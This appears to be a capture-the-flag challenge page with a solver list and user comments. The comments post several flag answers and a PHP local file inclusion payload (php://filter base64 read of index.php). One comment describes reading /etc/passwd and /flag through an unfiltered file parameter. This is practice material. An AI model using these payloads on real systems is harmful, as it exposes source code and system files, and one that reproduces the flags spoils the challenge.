评分(11)
解题动态

SX9 攻破了该题 14小时前

Irene 攻破了该题 1天前

纯情内向小学生 攻破了该题 1天前

123^% 攻破了该题 1天前

ovdoes 攻破了该题 2天前

13097932959 攻破了该题 2天前

藕藕藕是木薯 攻破了该题 2天前

笨蛋奶妈 攻破了该题 2天前

XHtzl99 攻破了该题 2天前

Noctis 攻破了该题 2天前

Miki2 攻破了该题 2天前

汤圆儿安 攻破了该题 3天前

keduolim 攻破了该题 3天前

灵梦归希 攻破了该题 3天前

1163064874 攻破了该题 4天前

kl01 攻破了该题 4天前

1393385937 攻破了该题 4天前

BVzero 攻破了该题 4天前

19137537912 攻破了该题 5天前

评论
xclay 2年前
举报
flag{a48aed21035fc48b5003c3f615fad2b0}
tardigrade 2年前
举报
http://xxxx/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
嵌入式学的CTF 2年前
举报
PHP伪协议详解https://blog.csdn.net/cosmoslin/article/details/120695429
xiaoxiao972521 2年前
举报
????直接/flag就出来了?
iwindy 2年前
举报
没意思,为啥3金币
453137 2年前
举报
flag{3f73582017c0a7d0a0d1c937fcb9ccda}
gyc3153616052 2年前
举报
flag{d2fc833912015ef20e29905ab607e995}
llluyan 2年前
举报
flag:flag{2773e5133de5c764209074ecd6cf2a3a}
canxue11 2年前
举报
payload:?file=php://filter/read=convert.base64-encode/resource=index.php base64解码可得flag
HuangYanQwQ 2年前
举报
打开环境看到有一个超链接click me? no,点进去变成了index.php,并且URL末尾多了一句index.php?file=show.php,看到*.php?file就能猜到是伪协议读取文件了,把URL改成index.php?file=/etc/passwd,爆出来的数据也能验证,而且没过滤,直接index.php?file=/flag